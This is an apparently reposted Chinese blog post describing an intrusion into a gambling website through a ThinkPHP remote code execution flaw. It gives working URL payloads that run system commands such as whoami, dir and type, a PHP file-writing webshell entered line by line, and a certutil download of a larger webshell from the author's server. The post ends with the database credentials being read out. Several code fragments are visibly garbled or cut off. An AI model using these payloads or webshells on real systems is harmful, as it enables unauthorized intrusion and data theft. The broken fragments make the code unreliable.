一网友分享:对某一个博彩网站的渗透测试之路

简单看了下,应该有不少人玩吧?

对某一个博彩网站的渗透测试之路

正好我前几天写了个测试工具,先掏出来测试一发。不知道行不行呢

但是幸运的是工具该站点显示存在漏洞

对某一个博彩网站的渗透测试之路

然后我们一键getshell,看起来很顺利的样子

对某一个博彩网站的渗透测试之路

但是我突然发现事情没有我想的那么简单

在连接的时候,竟然显示返回500错误。

对某一个博彩网站的渗透测试之路

但是我们用火狐的hackbar验证下,没毛病啊,那为什么菜刀连接不上呢?

我不禁陷入了沉思…

对某一个博彩网站的渗透测试之路

然后开始分析因为这个工具自己写的,从上面getshell的图片中发现调用的是第三个exp,那么我们来分析下看看。

poc如下

/?s=index/thinkap_user_func_array&vars[0]=system&vars[1][]=dir

我们在poc后面输入whoami看看权限。

s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

iis权限但是可以执行部分命令,比如echo dir等等。

对某一个博彩网站的渗透测试之路

尝试突破拿shell

既然可以执行echo 那么我们可以来尝试写入个小马试试,如果成功的话,再利用小马上传大马,说干就干,苦活来了,我们得一行一行写入进去。

注意:代码中的<>符号,要用^^转义。比如<?php转义为^<^?php

?phpheader(“content-Type: text/html; charset=gb2312″); if(get_magic_quotes_gpc()) foreach($_POSTas$k=>$v) $_POST[$k] = stripslashes($ubmit”value=”保存”><form><?phpif(isset($_POST[‘file’])) { $fp= @fopen($_POST[‘file’],’wb’); echo@fwrite($fp,$_POST[‘text’]) ? ‘保存成功!’: ‘保存失败!’; @fclose($fp); } ?>

逐行写入完成后,访问的时候发现并不能正常运行,这里忘记截图了。。

接下来尝试用以下方法下载文件到服务器上也失败了。但是正当我打算放弃的时候,我想起来还有个下载的命令没用。那就是certutil.exe

说干就干,把大马放到我们服务器上,开启HFS。

然后执行以下命令。

对某一个博彩网站的渗透测试之路

成功进入大马,不过别高兴太早。

对某一个博彩网站的渗透测试之路

大马可以操作文件上传改名等等,但是无法编辑文件,无法查看文件源码等等,点开显示一片空白。

对某一个博彩网站的渗透测试之路

既然这样,那么我们进数据库看看吧。

我们都知道tp的数据库配置文件在以下这个位置

/applicatse.php

大马是无法打开了,那么我们可以用tp的命令执行漏洞尝试用type命令去读取这个文件。

/?s=index/thinkapp/invokefunction&function=call _user_func_array&vars[ 0]=system&vars[ 1][]=type c:wwwapplicationdatabase.php

尝试type读取失败,然后又想到copy命令。

把database.php拷贝到web根目录下,改名为1.txt

/?s=index/thinkapp/ibase.php c:wwwpublic1.txt

拷贝完成以后访问url/1.txt,发现里面是空的。

成功突破

经历了一系列的失败后,我冷静下来想了下,我们还可以用file_path去读取源码试试。

p$file_path= ‘c:/www/application/database.php’;if(file_exists($file_path)){$fp= fopen($file_path,’ fread($fp,filesize($file_path));echo$str= str_replace(‘rn’,'<br />’,$str); }

用大马上传这个文件到根目录下,然后访问,成功拿到数据库配置信息。

对某一个博彩网站的渗透测试之路

然后填写好配置信息,进入数据库。

对某一个博彩网站的渗透测试之路
对某一个博彩网站的渗透测试之路

原创文章,作者:棋牌游戏,如若转载,请注明出处:https://www.qp49.com/2019/05/28/2170.html

发表评论

邮箱地址不会被公开。 必填项已用*标注